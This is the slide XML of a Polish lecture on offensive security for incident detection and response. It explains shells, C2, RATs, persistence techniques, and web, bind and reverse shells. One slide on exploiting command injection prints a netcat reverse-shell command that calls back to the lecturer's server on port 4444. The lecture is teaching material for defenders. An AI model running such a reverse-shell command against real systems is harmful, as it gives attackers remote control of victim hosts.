                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>bieżące hasła prawowitych użytkowników są przechwytywane i</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="254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2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>udostępniane atakującemu (praktyczna funkcjonalność keyloggera)/emaile będą forwardowane (malicious rule)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="120024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4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2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>kontrola dostępu działa niezgodnie z przeznaczeniem, dając poszerzony</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="pl-PL" sz="254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2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>dostęp mimo braku odpowiednich  poświadczeń</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>konto użytkownika (zmienione hasło do rzadko używanego/porzuconego/nieaktywnego konta, stworzenie nowego konta)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>umieszczona w systemie podatność, w szczególności podatność prowadząca do Remote Code Execution/Local Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610640" y="351360"/>
            <a:ext cx="943200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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Bezpieczeństwo ofensywne?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45" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498240" y="1301400"/>
            <a:ext cx="11446200" cy="414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US" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Wykrywanie i reagowanie na incydenty bezpieczeństwa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> jest tematem ściśle osadzonym w bezpieczeństwie DEFENSYWNYM (obrona)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Niemniej nie da się mówić o bezpieczeństwie defensywnym bez rozumienia bezpieczeństwa ofensywnego</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Musimy wiedzieć, przed czym w ogóle próbujemy się bronić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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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Shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1450800"/>
            <a:ext cx="10893240" cy="357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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> to po prostu program przyjmujący od użytkownika komendy, wykonujący je i zwracający wyniki (wszystko w formie tekstowej)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Znany również jako wiersz poleceń</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>W systemach uniksopodobnych jest to zazwyczaj </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> (inne znane to np. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>dash</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>W systemach windowsowych jest to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> (funkcję tę również może pełnić </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Elementarne pojęcie w nomenklaturze administracji IT oraz bezpieczeństwa ofensywnego</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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0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Shell jako podstawowe narzędzie kontroli zdobytego systemu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738720" y="1769760"/>
            <a:ext cx="10893240" cy="39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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Proces kontroli w nomenklaturze DFIR określa się jako </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Command &amp; Control</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> (w skrócie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> lub </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Podstawowa funkcjonalność każdego Malware z kategorii RAT (inne funkcjonalności to np. wysyłanie i pobieranie plików, robienie zrzutów ekranu, używanie kamery/mikrofonu, logowanie wciśniętych klawiszy itd.)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Najczęściej używany zarówno:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="120024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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>tymczasowo, we wczesnej fazie ataku zakończonego udanym Code Execution</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2540" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="120024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40" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>długoterminowo (RAT jest najczęściej instalowanym rodzajem backdoora)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="254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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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Remote shell (C2) - rodzaje</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992160" y="2413440"/>
            <a:ext cx="11283120" cy="20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4200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Web shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4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4200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Bind shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4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4200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Reverse shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4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738720" y="399240"/>
            <a:ext cx="11376720" cy="1051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Remote Shell - Web</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454320" y="1652040"/>
            <a:ext cx="11283120" cy="40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mała aplikacja webowa (taka sama funkcjonalność, jak poprzedni przykład ping z Command Injection), umieszczona na (najczęściej istniejącym już wcześniej w systemie) serwerze www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serwer HTTP uruchamia ją za każdym razem, gdy jest wywoływana przez klienta HTTP komenda jest umieszczana w żądaniu HTTP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rezultat wykonania komendy wraca w odpowiedzi HTTP (tak jak w przypadku przykładu aplikacji webowej podatnej na proste OS Command Injection)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cała komunikacja odbywa się poprzez protokół HTTP (TCP)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przykładowy zbiór web shelli: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="24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https://github.com/danielmiessler/SecLists/tree/master/Web-Shells/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738720" y="11880"/>
            <a:ext cx="11376720" cy="615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7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Remote Shell - Bind</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529920" y="537480"/>
            <a:ext cx="11495520" cy="16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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Kontrolowany przez atakującego system oczekuje na połączenie przychodzące od atakującego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Połączenie odbywa się (najczęściej) z wykorzystaniem protokołu TCP, cel nasłuchuje na wybranym porcie (np. 4444 - wybór portu zależy od kilku czynników - przede wszystkim od ograniczeń wynikających z polityk firewalli oraz już otwartych portów nasłuchujących na hoście, w praktyce jest to najczęściej port 443)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90" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579320" y="1984320"/>
            <a:ext cx="9396720" cy="4701240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728720" y="6320520"/>
            <a:ext cx="746712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Źródło: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=wXkN6WGvadM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738720" y="11880"/>
            <a:ext cx="11376720" cy="615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7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Remote Shell - Bind</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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3" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="932400" y="1431720"/>
            <a:ext cx="10784880" cy="4857840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932400" y="702000"/>
            <a:ext cx="1014192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Wynik komendy nmap (port scan) pokazujący 3 porty TCP otwarte w trybie nasłuchu - serwera, gotowe na przyjęcie nowych połączeń - klientów;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25, 80, 111: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747720" y="0"/>
            <a:ext cx="11376720" cy="536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4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Remote Shell - reverse</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454320" y="536400"/>
            <a:ext cx="11283120" cy="210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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Kontrolowany przez atakującego system nawiązuje połączenie z systemem atakującego,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 oczekuje komend, wykonuje je i odsyła ich rezultaty</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Połączenie odbywa się (najczęściej) z wykorzystaniem protokołu TCP (tutaj przykład z użyciem ICMP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="22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https://github.com/ewilded/icmpsh-s-linux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)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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W praktyce najczęściej używany rodzaj shella (z powodu NAT i polityk firewalli)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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550880" y="2294280"/>
            <a:ext cx="9090000" cy="4295880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1702440" y="6320520"/>
            <a:ext cx="746712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Źródło: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0563c1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=wXkN6WGvadM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814680" y="0"/>
            <a:ext cx="11376720" cy="681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8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Reverse shell w akcji</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517680" y="681480"/>
            <a:ext cx="11283120" cy="24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Serwer atakującego: hackingiscool.pl (46.101.187.48)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Port, na którym atakujący oczekuje połączenia z reverse shella: 4444</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Cel (ofiara), na którym dochodzi do złośliwego Code Execution: example.org (użytkownik www-data)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Poniżej rozpoczęcie nasłuchiwania na 46.101.187.48, TCP, port 4444 (narzędzie użyte tutaj do nasłuchu na porcie 4444, wysyłania i odbierania komend to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat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):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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Picture 3" descr="A picture containing indoor, computer, sitting, computer&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="814680" y="2848680"/>
            <a:ext cx="9402480" cy="377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14680" y="0"/>
            <a:ext cx="11376720" cy="681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8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Reverse shell w akcji</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517680" y="681480"/>
            <a:ext cx="11283120" cy="277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Serwer atakującego: hackingiscool.pl (46.101.187.48)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Port, na którym atakujący oczekuje połączenia z reverse shella: 4444</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Cel (ofiara), na którym dochodzi do złośliwego Code Execution: example.org (użytkownik www-data)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Rolę narzędzia dostarczającego funkcję reverse shella na komputerze ofiary również pełni tutaj narzędzie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat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 (tę samą funkcjonalność można uzyskać mnóstwem innych rozwiązań, np. programem napisanym C/C++, skrypcie w Pythonie, PHP, programie w Javie itd.):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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334600" y="3229920"/>
            <a:ext cx="6688080" cy="3517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14680" y="0"/>
            <a:ext cx="11376720" cy="681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8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Reverse shell w akcji</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517680" y="681480"/>
            <a:ext cx="11283120" cy="210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Serwer atakującego: hackingiscool.pl (46.101.187.48)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Port, na którym atakujący oczekuje połączenia z reverse shella: 4444</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Cel (ofiara), na którym dochodzi do złośliwego Code Execution: example.org (użytkownik www-data)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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Rolę narzędzia dostarczającego funkcję reverse shella pełni tutaj narzędzie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Picture 5" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="887040" y="2606760"/>
            <a:ext cx="7545240" cy="4071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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619640" y="78840"/>
            <a:ext cx="943200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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>HACKING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47" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507240" y="721440"/>
            <a:ext cx="11446200" cy="469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Technologia</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Zamiłowanie</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Rozumienie</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Rozwijanie, ulepszanie</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Znajdowanie problemów i rozwiązań, odkrywanie nowych zastosowań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Bez hackingu nie istniałoby bezpieczeństwo ofensywne (ani defensywne)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Nauka i sztuka (ang.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</a:rPr>
              <a:t>science and art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)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Filozofia (podejście do życia, lifehacking ;))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Jako część nauki i techniki, hacking jest zjawiskiem:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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użytecznym,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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moralnie neutralnym.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754200" y="319320"/>
            <a:ext cx="11376720" cy="1319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Exploitacja OS command injection - reverse shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454320" y="1639080"/>
            <a:ext cx="11283120" cy="511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Komenda wykonana na zdalnym systemie w tym przypadku inicjuje połączenie zwrotne z wykorzystaniem basha i netcata (reverse shell):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US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="c0c0c0"/>
                </a:highlight>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>nc -e /bin/bash 46.101.187.48 4444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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Picture 8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754200" y="2541240"/>
            <a:ext cx="6393240" cy="2385000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Picture 10" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109400" y="3384360"/>
            <a:ext cx="8082360" cy="2649600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4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754200" y="319320"/>
            <a:ext cx="11376720" cy="1319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Exploitacja OS Command Injection - download &amp; exec</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="435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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454320" y="1639080"/>
